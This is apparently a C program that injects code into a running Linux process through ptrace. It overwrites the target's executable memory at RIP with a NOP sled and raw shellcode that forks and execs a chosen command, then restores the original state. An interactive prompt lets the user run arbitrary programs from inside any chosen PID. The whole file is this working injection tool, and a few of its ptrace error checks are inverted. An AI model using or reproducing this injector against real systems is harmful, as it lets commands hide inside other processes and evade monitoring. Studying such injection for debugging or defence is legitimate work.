#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <errno.h>
#include <limits.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


/* Payload under construction: a byte image plus the target-side addresses
 * the tracer loads into registers before running it. */
struct payload {
	char *data;                /* caller-supplied buffer the image is written into */
	int length;                /* number of bytes of data used so far */
	unsigned long entrypoint;  /* target address where execution should start */
	unsigned long argv;        /* target address of the argv pointer array */
};
typedef struct payload payload_t;


//this should be enough to clean up any bad instruction globbing with the previous bytes
const char *nopsled = "\x90\x90\x90\x90\x90\x90\x90\x90";
//const char *shellcode = "\x0f\x05\xcc";
//                     syscall    | cmp rax 0    |jmp +09  |mov rax 0x3b               |syscall|int| 
const char shellcode[] = "\x0f\x05\x48\x83\xf8\x00\x75\x09\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\xcc";
int shellcode_size = sizeof(shellcode);


//[filename][argv0][argv1][&argv0][&argv1][null ptr to terminate argv][nop sled][shellcode]
/*
 * Serialize the command and the shellcode into payload->data with the layout
 *   [filename\0][argv0\0]...[argvN-1\0][&argv0]...[&argvN-1][NULL][nop sled][shellcode]
 * `rip` is the target address at which payload->data will be written, so
 * every pointer stored in the image is computed relative to it.
 *
 * On return:
 *   payload->length     bytes of payload->data used
 *   payload->argv       target address of the argv pointer array
 *   payload->entrypoint target address of the first shellcode byte
 *
 * The bytes come from `shellcode`; how many are copied is the global
 * shellcode_size.
 *
 * Precondition: payload->data must be large enough for the whole layout.
 * This function performs no bounds checking.
 */
void build_payload(payload_t *payload, const char *filename, int argc, char *argv[], const char *shellcode, unsigned long rip){
	const size_t filename_len = strlen(filename);
	const size_t nopsled_len = strlen(nopsled);
	const unsigned long null_pointer = 0;
	unsigned long string_addr;
	int i;

	payload->length = 0;

	/* filename including its NUL terminator, at offset 0 */
	memcpy(payload->data, filename, filename_len + 1);
	payload->length += (int)(filename_len + 1);

	/* argv strings, each NUL-terminated, directly after the filename */
	string_addr = rip + (unsigned long)payload->length;
	for(i = 0; i < argc; i++){
		size_t arg_size = strlen(argv[i]) + 1;
		memcpy(payload->data + payload->length, argv[i], arg_size);
		payload->length += (int)arg_size;
	}

	/* argv pointer array: target address of each string in host byte order.
	 * Each entry is the width of a pointer (unsigned long), not of payload_t *. */
	payload->argv = rip + (unsigned long)payload->length;
	for(i = 0; i < argc; i++){
		memcpy(payload->data + payload->length, &string_addr, sizeof string_addr);
		payload->length += (int)sizeof string_addr;
		string_addr += strlen(argv[i]) + 1;
	}

	/* NULL entry terminating the argv array */
	memcpy(payload->data + payload->length, &null_pointer, sizeof null_pointer);
	payload->length += (int)sizeof null_pointer;

	/* NOP padding, then the shellcode; execution begins at the shellcode */
	memcpy(payload->data + payload->length, nopsled, nopsled_len);
	payload->length += (int)nopsled_len;

	payload->entrypoint = rip + (unsigned long)payload->length;
	memcpy(payload->data + payload->length, shellcode, (size_t)shellcode_size);
	payload->length += shellcode_size;
}


/*
 * Debug dump of a built payload to stdout: its length, every byte as two-digit
 * hex, and the entrypoint address on its own line.
 */
void print_payload(payload_t *payload){
	int i;

	printf("Payload length: %d\n", payload->length);
	for(i = 0; i < payload->length; i++){
		printf("%02x ", (unsigned char)payload->data[i]);
	}
	/* terminate the hex dump line before the next message */
	printf("\nNew rip entrypoint %lx\n", payload->entrypoint);
}

void run_program(pid_t target_pid, char *child_argv[], int child_argc){
	struct user_regs_struct regs;
	struct user_regs_struct og_regs;
	const char *filename = child_argv[0];
	payload_t payload;
	char payload_data[1024] = {'\0'};
	unsigned long og_data[128] = {};
	int og_data_length = 0;
	int status;
	payload.data = payload_data;
	if(ptrace(PTRACE_ATTACH, target_pid, NULL, NULL) != -1){
		perror("ptrace attach");
		//return 2;
	}
	
	if(waitpid(target_pid, &status, WSTOPPED) != target_pid){
		perror("waitpid");
		//return 3;
	}
	if (ptrace(PTRACE_GETREGS, target_pid, NULL, &regs) == -1) {
		perror("ptrace getregs");
	}
	og_regs = regs;
	printf("RIP: %llx\n", regs.rip);
	build_payload(&payload, filename, child_argc, child_argv, shellcode, regs.rip);
	print_payload(&payload);



	//Now we need to get the words of executable memory of the victim we are going to overwrite to save them for when we write back
	int i;
	for(i = 0; i < payload.length; i += sizeof(long)){
		unsigned long word = ptrace(PTRACE_PEEKDATA, target_pid, regs.rip + i, NULL);
		og_data[i/sizeof(long)] = word;
		og_data_length++;
	}
	printf("og data length %d\n", og_data_length);


	//Write out payload to executable memory of the victim
	for(i = 0; i < payload.length; i+= sizeof(long)){
		unsigned long word = *(unsigned long *)(payload.data+i);
		printf("%lx ", word);
		ptrace(PTRACE_POKEDATA, target_pid, regs.rip + i, word);
	}

	//Set up registers for execution of payload
	//rdi - filename, rsi - argv
	regs.rdi = regs.rip;
	regs.rsi = payload.argv;
	regs.rip = payload.entrypoint;	
	regs.rax = 0x39;
	regs.rdx = 0x0;

	if (ptrace(PTRACE_SETREGS, target_pid, NULL, &regs) == -1) {
		perror("ptrace setregs");
	}

	//Resume prococess execution
	ptrace(PTRACE_CONT, target_pid, NULL, NULL);


	//Wait for SIGTRAP from the 0xcc interrupt	
	waitpid(target_pid, &status, 0);
	if(WIFSTOPPED(status) && WSTOPSIG(status) == SIGTRAP){
		printf("Target process stopped.\n");
		//Rewrite memory
		for(i = 0; i < og_data_length; i++){	
			unsigned long word = og_data[i];
			ptrace(PTRACE_POKEDATA, target_pid, og_regs.rip + i*sizeof(word), word);
		}
		//Rewrite registers
		if (ptrace(PTRACE_SETREGS, target_pid, NULL, &og_regs) == -1) {
			perror("ptrace setregs");
		}
		//Detach ptrace
		if(ptrace(PTRACE_DETACH, target_pid, NULL, NULL) != -1){
			perror("ptrace detach");
		}
	}
}


/*
 * Fork an idle child process to serve as the default injection target.
 * The child loops in sleep() forever and never returns from this function.
 * Returns the child's pid in the parent, or -1 (after printing the error)
 * if fork() fails.
 */
pid_t make_child(void){
	pid_t child_pid = fork();

	if(child_pid == -1){
		perror("fork");
		return -1;
	}
	if(child_pid == 0){
		for(;;){
			sleep(5);
		}
	}
	return child_pid;
}




/* Maximum number of arguments parse_line() stores; argv must have room for
 * PARSE_LINE_MAX_ARGS + 1 entries (the extra slot holds the NULL terminator). */
enum { PARSE_LINE_MAX_ARGS = 127 };

/*
 * Split `line` in place into whitespace-separated arguments.
 * Separators are space, tab, CR and LF. Runs of separators are collapsed,
 * and a final argument with no trailing newline is still returned.
 * Each separator that ends a token is overwritten with '\0', and argv[i]
 * points into `line`.
 * At most PARSE_LINE_MAX_ARGS arguments are stored; further ones are ignored.
 * argv[argc] is set to NULL. Returns argc (0 for a blank line).
 */
int parse_line(char *line, char *argv[]){
	static const char separators[] = " \t\r\n";
	int argc = 0;
	char *cursor = line;

	while(argc < PARSE_LINE_MAX_ARGS){
		cursor += strspn(cursor, separators);   /* skip separator run */
		if(*cursor == '\0'){
			break;
		}
		argv[argc++] = cursor;
		cursor += strcspn(cursor, separators);  /* advance to end of token */
		if(*cursor != '\0'){
			*cursor++ = '\0';
		}
	}
	argv[argc] = NULL;
	return argc;
}


/*
 * Execute one parsed command line.
 * "setpid <pid>" changes the injection target. Any other command is a program
 * (child_argv[0]) plus arguments, which run_program() launches from inside
 * the current target. An empty command is ignored.
 */
void shell_exec(int *target_pid, char *child_argv[], int child_argc){
	if(child_argc < 1){
		return;
	}
	if(strcmp("setpid", child_argv[0]) == 0){
		char *end;
		long value;

		if(child_argc < 2){
			fprintf(stderr, "usage: setpid <pid>\n");
			return;
		}
		errno = 0;
		value = strtol(child_argv[1], &end, 10);
		if(end == child_argv[1] || *end != '\0' || errno == ERANGE || value <= 0 || value > INT_MAX){
			fprintf(stderr, "setpid: invalid pid '%s'\n", child_argv[1]);
			return;
		}
		*target_pid = (int)value;
		printf("Set target pid to %d\n", *target_pid);
		return;
	}
	run_program(*target_pid, child_argv, child_argc);
}

/*
 * Interactive loop: read a command per line and run it inside the target.
 * The target is argv[1] if given, otherwise a freshly forked idle child,
 * which is killed and reaped when input ends.
 */
int main(int argc, char *argv[]){
	pid_t target_pid;
	pid_t own_child = -1;
	char line[4096] = {'\0'};
	char *child_argv[128] = {NULL};
	int child_argc;

	if(argc < 2){
		own_child = make_child();
		if(own_child == -1){
			fprintf(stderr, "could not create target process\n");
			return EXIT_FAILURE;
		}
		target_pid = own_child;
	} else {
		char *end;
		long value;

		errno = 0;
		value = strtol(argv[1], &end, 10);
		if(end == argv[1] || *end != '\0' || errno == ERANGE || value <= 0 || value > INT_MAX){
			fprintf(stderr, "invalid pid '%s'\n", argv[1]);
			return EXIT_FAILURE;
		}
		target_pid = (pid_t)value;
	}

	for(;;){
		printf("$ ");
		fflush(stdout); /* prompt has no newline */
		if(fgets(line, sizeof(line), stdin) == NULL){
			break; /* EOF or read error: stop instead of re-running the old line */
		}
		if(strlen(line) == 1) continue;
		child_argc = parse_line(line, child_argv);
		if(child_argc == 0) continue;
		shell_exec(&target_pid, child_argv, child_argc);
	}

	/* don't leave the idle child we created running after we exit */
	if(own_child > 0){
		kill(own_child, SIGKILL);
		waitpid(own_child, NULL, 0);
	}
	return EXIT_SUCCESS;
}
